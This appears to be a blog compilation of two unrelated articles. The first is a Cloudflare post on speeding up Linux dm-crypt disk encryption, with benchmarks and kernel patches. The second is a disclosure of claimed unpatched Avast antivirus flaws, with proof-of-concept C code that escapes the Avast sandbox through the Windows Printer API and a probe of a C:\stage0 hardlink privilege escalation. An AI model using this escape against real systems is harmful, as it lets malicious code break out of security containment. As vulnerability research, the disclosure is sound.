Speeding up Linux disk encryption

Original text by Ignat Korchagin

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don’t encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

[diagram: simplified storage stack and the encryption options at each layer]

On the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes; the hardware specifics of the underlying storage device are abstracted away from the filesystem. Finally, the block subsystem actually passes the block reads and writes to the underlying hardware using appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a higher-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layers (either in hardware or in software) or at the file level (either directly in applications or in the filesystem).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is they actually have to implement it themselves and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching and Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted “cache”, which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless if the application has crypto support or not. Also, file systems can be configured to encrypt only a particular directory or have different keys for different files. This flexibility, however, comes at a cost of a more complex configuration. File system encryption is also considered less secure than block device encryption as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space. It is less flexible though — one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used as the block layer doesn’t have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.

So which layer to choose? As always, it depends… Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security — with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into «important» vs «not important» buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes fewer resources from the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which rendered the whole security model useless. Microsoft, for example, has preferred software-based disk encryption since then.

We didn’t want to put our data and our customers’ data at risk by using potentially insecure solutions, and we strongly believe in open-source. That’s why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is a supposed-to-be-public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via a dm-crypt module, and dm-crypt itself is part of the device mapper kernel framework. In a nutshell, the device mapper allows pre/post-processing of IO requests as they travel between the file system and the underlying block device.

dm-crypt in particular encrypts «write» IO requests before sending them further down the stack to the actual block device and decrypts «read» IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there — that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:


$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0

Now we can set up a dm-crypt instance on top of it, thus enabling encryption for the disk. First, we need to generate the disk encryption key, «format» the disk and specify a password to unlock the newly generated key.


$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img

WARNING!
========
This will overwrite data on crypthdr.img irrevocably.

Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with LUKS/dm-crypt might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually «unlock» the encrypted device for our testing:


$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to /dev/ram0, it will be stored in plaintext. Likewise, if we read/write data to /dev/mapper/encrypted-ram0, it will be decrypted/encrypted on the way by dm-crypt and stored in ciphertext.

It’s worth noting that we’re not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking Flexible I/O tester is the usual go-to solution. Let’s simulate simple sequential read/write load with 4K block size on the ramdisk without encryption:


$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec

Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we’re able to read and write with roughly the same throughput of around 1126 MB/s. Let’s repeat the test with the encrypted ramdisk:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that’s a drop! We only get ~147 MB/s now, which is more than 7 times slower! And this is on a totally idle machine!

Maybe, crypto is just slow

The first thing we considered was to ensure we use the fastest crypto. cryptsetup allows us to benchmark all the available crypto implementations on the system to select the best one:


$ sudo cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
#  Algorithm | Key |  Encryption |  Decryption
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A

It seems aes-xts with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?


$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use aes-xts with a 256-bit data encryption key (count all the zeroes conveniently masked by the dmsetup tool — if you want to see the actual bytes, add the --showkeys option to the above command). The numbers do not add up however: cryptsetup benchmark tells us above not to rely on the results, as «Tests are approximate using memory only (no storage IO)», but that is exactly how we’ve set up our experiment using the ramdisk. In a somewhat worse case (assuming we’re reading all the data and then encrypting/decrypting it sequentially with no parallelism), a back-of-the-envelope calculation says we should be getting around (1126 * 1823) / (1126 + 1823) ≈ 696 MB/s, which is still quite far from the actual 147 * 2 = 294 MB/s (total for reads and writes).

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with --perf-, which are probably related to performance tuning. The first one is --perf-same_cpu_crypt with a rather cryptic description:


Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option


$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a cryptsetup refresh command, which can be used to enable these options live without having to «close» and «re-open» the encrypted device. Our cryptsetup version, however, didn’t support it yet.

Let’s verify that the option has really been enabled:


$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see same_cpu_crypt in the output, which is what we wanted. Let’s rerun the benchmark:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is ~136 MB/s, which is slightly worse than before, so no good. What about the second option --perf-submit_from_crypt_cpus:


Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the «some situation» here, so let’s try it out:


$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus

And now the benchmark:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s, which is a bit better, but still not good…

Asking the community

Being desperate, we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation…

We decided to do some scientific research on this topic by typing «is encryption expensive» into Google Search, and one of the top results, which actually contains meaningful measurements, is… our own post about the cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom dm-crypt options described above we were curious why they exist in the first place and what that «offloading» is all about. Originally we expected dm-crypt to be a simple «proxy», which just encrypts/decrypts data as it flows through the stack. Turns out dm-crypt does more than just encrypting memory buffers, and a (simplified) IO traverse path diagram is presented below:

[diagram: simplified dm-crypt IO traverse path]

When the file system issues a write request, dm-crypt does not process it immediately — instead it puts it into a workqueue named «kcryptd». In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When «the time» comes, dm-crypt sends the request to the Linux Crypto API for actual encryption. However, the modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system uses, most likely it will not be processed immediately, but queued again for «later time». When the Linux Crypto API finally does the encryption, dm-crypt may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread again at «some time later» actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data first from the hardware, but dm-crypt does not just ask the driver for the data — it queues the request into a different workqueue named «kcryptd_io». At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar «kcryptd» workqueue. «kcryptd» will send the request to the Linux Crypto API, which may decrypt the data asynchronously as well.
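
To make the «workqueue» part less abstract, here is a minimal, generic illustration of the kernel workqueue pattern (a toy module made up for this post, not dm-crypt's actual code): work is handed to a queue and executed later by a kernel worker.

#include <linux/module.h>
#include <linux/workqueue.h>

static struct workqueue_struct *demo_wq;

/* Runs «at some later time», on whatever CPU the workqueue picks. */
static void demo_work_fn(struct work_struct *work)
{
        pr_info("deferred work is running now\n");
}

static DECLARE_WORK(demo_work, demo_work_fn);

static int __init demo_init(void)
{
        /* WQ_UNBOUND lets the work be balanced across available CPUs,
         * which is the default behaviour --perf-same_cpu_crypt turns off. */
        demo_wq = alloc_workqueue("demo_wq", WQ_UNBOUND, 0);
        if (!demo_wq)
                return -ENOMEM;

        /* The caller returns immediately; demo_work_fn() runs later. */
        queue_work(demo_wq, &demo_work);
        return 0;
}

static void __exit demo_exit(void)
{
        destroy_workqueue(demo_wq);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");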

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in dm-crypt and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The «kcryptd» workqueue has been in the source since the beginning of the available history, with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then — why do we care if it is interrupt context or not, if Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 Crypto API was not asynchronous, so this made perfect sense.

In 2006 dm-crypt started to use the «kcryptd» workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather reduce kernel stack usage, which makes sense again as the kernel has a common stack across all the code, so it is a quite limited resource. It is worth noting, however, that the Linux kernel stack has been expanded in 2014 for x86 platforms, so this might not be a problem anymore.

The first version of the «kcryptd_io» workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation…

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate «dmcrypt_write» thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense, as sequential disk access used to be much faster than random access and dm-crypt was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVMe SSDs).

Another part of the commit message is worth mentioning:

…in particular it enables IO schedulers like CFQ to sort more effectively…

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that the CFQ scheduler was removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All that makes sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar «submit_from_crypt_cpus» option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The «clean-up»

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert dm-crypt to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another dm-crypt option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in dm-crypt. The modern Linux Crypto API may also be asynchronous, and for the sake of this experiment we want to eliminate queues there as well. What does «may be» mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the «best» one based on the configured algorithm priority. dm-crypt allows overriding this behaviour and requesting a particular cipher implementation using the capi: prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:


$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are xts(ecb(aes-generic)) (the generic C implementation) and __xts-aes-aesni (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we’re aiming for performance here), but it is suspiciously marked as internal (see internal: yes). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means that the caller of the Crypto API needs to explicitly specify this flag when requesting a particular cipher implementation, but dm-crypt does not do it, because by design it is not part of the Linux Crypto API, rather an «external» user. We already patch the dm-crypt module, so we could just as well add the relevant flag. However, there is another problem with AES-NI in particular: the x86 FPU. «Floating point» you say? Why do we need floating point math to do symmetric encryption, which should only be about bit shifts and XOR operations? We don’t need the math, but AES-NI instructions use some of the CPU registers which are dedicated to the FPU. Unfortunately, the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring the FPU state is expensive). But dm-crypt may execute code in interrupt context, so we risk corrupting some other process' data, and we go back to the «it would be very unwise to do decryption in an interrupt context» statement in the original code.

Our solution to address the above was to create another somewhat «smart» Crypto API module. This module is synchronous and does not roll its own crypto, but is just a «router» of encryption requests (see the sketch below):

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, «internal» __xts-aes-aesni implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation
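
A minimal sketch of that dispatch decision, using the real x86 FPU helpers but as a made-up demo module (this is an illustration of the idea, not the actual xtsproxy code):

#include <linux/module.h>
#include <asm/fpu/api.h>    /* irq_fpu_usable(), kernel_fpu_begin()/kernel_fpu_end() */

/* Decide, per request, whether the FPU (and thus AES-NI) may be used
 * in the current execution context. */
static void pick_backend(void)
{
        if (irq_fpu_usable()) {
                kernel_fpu_begin();
                /* ...forward the request to the fast «__xts-aes-aesni» implementation... */
                kernel_fpu_end();
                pr_info("xtsproxy-demo: AES-NI path\n");
        } else {
                /* ...forward the request to the generic «xts(ecb(aes-generic))» one... */
                pr_info("xtsproxy-demo: generic C path\n");
        }
}

static int __init demo_init(void)
{
        pick_backend();
        return 0;
}

static void __exit demo_exit(void)
{
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");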

Using the whole lot

Let’s walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile dm-crypt and our xtsproxy modules).

Next, let’s restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:


$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched dm-crypt flag (we have to use the low-level dmsetup tool, as cryptsetup obviously is not aware of our modifications):


$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0

We just «loaded» the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:


$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the fio job and look at the output, but to make things nicer, here’s a snapshot of the observed read/write throughput in Grafana:

[Grafana snapshots: read and write throughput, annotated]

Wow, we have more than doubled the throughput! With the total throughput of ~640 MB/s we’re now much closer to the expected ~696 MB/s from above. What about the IO latency? (The await statistic from the iostat reporting tool):

[graph: iostat await latency, annotated]

The latency has been cut in half as well!

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we’re not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

[graph: production p99 cache-hit response times]

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That’s a win!

We’re just getting started

This post shows how an architecture review can double the performance of a system. Also we reconfirmed that modern cryptography is not expensive and there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!

Oh, so you have an antivirus… name every bug

Original text by halove23

After my previous disclosures involving Windows Defender and Windows Setup, this is the next one.

First of all, why? Because I can, and because I need a job.

In this blog I will be disclosing about eight 0-day vulnerabilities, all of them still unknown to the vendors. Don’t expect those bugs to keep working for more than a week or two, because the vendors will probably release emergency security patches to fix them.

Avast antivirus

a.   Sandbox Escape

So Avast antivirus (any paid version) has a feature called the Avast sandbox, which allows you to test a suspicious file in a sandbox. But this sandbox is completely different from any sandbox I know. Windows sandboxed apps, for example, run in a special container and also have some mitigations applied to their tokens (such as lowering token integrity, applying the create-process mitigation…), and other sandboxes run a suspicious file in a virtual machine instead, so the file stays completely isolated. The Avast sandbox is something completely different: the sandboxed app runs in the OS with only a few security mitigations applied to its token, such as removing some privileges like SeDebugPrivilege, SeShutdownPrivilege…, while the token integrity stays the same, which isn’t enough to make a sandbox on its own. The Avast sandbox actually creates a virtualized file stream and registry hive almost identical to the real ones, and it also forces the sandboxed app to use the virtualized stream by hooking every single WINAPI call! This sounds cool but also sounds impossible: any incomplete hooking could result in a sandbox escape.

Btw, the virtualized file stream is located in “C:\avast! sandbox”

The virtualized registry hive exists in “H****\__avast! Sandbox”, and it looks like there’s also a virtualized object manager namespace in “\snx-av\”.

So normally, to make any escape, I should read the available write-ups related to Avast sandbox escapes, and after some research it looks like I found something: CVE-2016-4025 and another bug by Google Project Zero.

Nettitude Labs covered a crafted DeviceIoControl call used to escape from the virtualization. They noticed that after using the “Save As” feature in Notepad, the saved file actually lands outside the sandbox (in the real filesystem), and it looked like my way out.

I tried their way by clicking on “Save As” and it doesn’t seem to work anymore, because the patch has disabled that path. So instead of clicking on “Save As” I clicked on “Print”.

By doing that we get another pop-up, so I clicked Print with the default printer “Microsoft XPS Document Writer”.

And yup, we get a “Save As” window after clicking on Print.

So I clicked on Save. I really didn’t expect anything to happen, but guess what:

The file was spawned outside the virtualized file stream. That’s clearly a sandbox escape.

How? It looks like an external process wrote the file while impersonating notepad’s access token. Luckily, since CVE-2020-1337 I had been focused on learning the Printer API by reading every piece of documentation provided by Microsoft, and on the other side James Forshaw published something related to a Windows sandbox escape using the Printer API here.

So I assume we can easily escape from the sandbox if we manage to call the Printer API correctly. We will begin with the OpenPrinter function.

And of course we will specify in pPrinterName the default printer that exists on a standard Windows installation, “Microsoft XPS Document Writer”.

Next we will go for the StartDocPrinter function, which allows us to prepare a document for printing; the third argument looks kinda important.

So we will take a look at the DOC_INFO_1 struct, and there’s some good news.

It looks like the second member (pOutputFile) will allow us to specify the actual output file name, so yeah, it’s probably our way out of the Avast sandbox.

So what now? We can probably create the file outside the sandbox, but what about writing things to it? After further research I found another function which works like WriteFile: WritePrinter.

Then the final result will look like this:
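
As an illustration only (not the author’s actual PoC; the output path below is a made-up example), the OpenPrinter → StartDocPrinter → WritePrinter chain could be put together like this:

#include <windows.h>
#include <winspool.h>
#include <stdio.h>

#pragma comment(lib, "winspool.lib")

int main(void)
{
    HANDLE hPrinter = NULL;
    DWORD written = 0;
    wchar_t printerName[] = L"Microsoft XPS Document Writer";
    /* Hypothetical path outside the virtualized file stream */
    wchar_t outputFile[]  = L"C:\\Users\\Public\\escaped.txt";
    char payload[] = "written through the print spooler\r\n";
    DOC_INFO_1W doc = { 0 };

    if (!OpenPrinterW(printerName, &hPrinter, NULL)) {
        printf("OpenPrinter failed: %lu\n", GetLastError());
        return 1;
    }

    doc.pDocName    = L"escape";
    doc.pOutputFile = outputFile;   /* the interesting member: where the "print job" is written */
    doc.pDatatype   = L"RAW";

    if (StartDocPrinterW(hPrinter, 1, (LPBYTE)&doc) == 0) {
        printf("StartDocPrinter failed: %lu\n", GetLastError());
        ClosePrinter(hPrinter);
        return 1;
    }

    StartPagePrinter(hPrinter);
    WritePrinter(hPrinter, payload, (DWORD)(sizeof(payload) - 1), &written);
    EndPagePrinter(hPrinter);
    EndDocPrinter(hPrinter);
    ClosePrinter(hPrinter);
    return 0;
}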

Note: The bug was reported to the vendor but, as usual, they didn’t reply.

b.   Privilege Escalation

It was a bit hard to find a privilege escalation, but after taking some time, here you go Avast. There’s a feature in Avast called “REPAIR APP”; after clicking on it, it looks like a new child process called “Instup.exe” is created by the Avast Antivirus Engine.

There’s probably something worth looking at there after attempting to repair the app. In this case we will be using a tool called Process Monitor.

And as usual we got something worth our attention: the instup process looks for some non-existent directories, C:\stage0 and C:\stage1.

So what if they exist?

I created the C:\stage0 directory with a file inside it, took a look at how instup.exe behaves against it, and observed an unexpected behaviour: instead of just deleting or ignoring the file, it actually creates a hardlink to the file.

We could exploit this: if we could guess the hardlink name at the moment it is created, we could redirect the creation to an arbitrary location. Unluckily, the hardlink’s random name is incredibly hard to guess, and who knows how much time that would take, so I preferred not to look there and instead started looking somewhere else.

